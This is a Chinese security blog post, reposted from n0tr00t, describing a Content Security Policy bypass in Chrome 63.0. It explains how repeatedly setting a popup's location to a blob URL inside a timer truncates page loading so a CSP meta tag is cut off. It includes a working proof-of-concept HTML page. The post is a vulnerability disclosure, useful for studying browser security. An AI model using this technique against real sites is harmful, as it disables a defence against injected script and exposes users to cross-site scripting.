如何绕过Chrome 63.0版本的CSP

xiannv  299天前

转自: n0tr00t

0x01 TL;DR

我观察到当 try catch 在计时器中使用 location 设置 blob scheme 时,网络请求加载会被随机阻断(页面完成加载但内容部分缺失,有趣的是内容缺失是从上到下的顺序),这个缺陷让我想到能够利用并优先吃掉 head 头中出现的 CSP 防御策略,这样声明的策略就会彻底失效,注入内容能够顺利执行。

比如这样:

<cut>

content...

<me ta http-equiv="Content-Security-Policy" content="sc ript-src 'self'; ob ject-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

</cut>

content...

here injection

截断 Google or Bing:

1.jpg1.jpg

0x02 PoC

<html>
    <!-- author: evi1m0.bat[at]gmail.com -->
    <sc ript>
        pwn = () => {
            target = 'http://server.n0tr00t.com/chrome/csptest.php?p=' + Date();
            win = window.open(target, "emm", "width=500,height=400");

            setInterval(`try{
                    x = win.location.href;
                } catch(e) {
                    win.location.href = 'blob://';
                }`, 1);
        }
    </sc ript>

    <p>
      <a on click="pwn()" target="_blank">Click me bypass CSP</a>
      // If it doesn't work, again. :)
    </p>
</html>

0x03 Video

http://server.n0tr00t.com/chrome/cut_bypasscsp.mp4

0x04 Track

来源:https://www.n0tr00t.com/2018/12/19/Chrome-63-0-CSP-Bypass.html

最新评论

昵称
邮箱
提交评论

友情链接:FOFA FOEYE BCSEC BAIMAOHUI 安全客 i春秋

nosec.org All Rights Reserved 京ICP备15042518号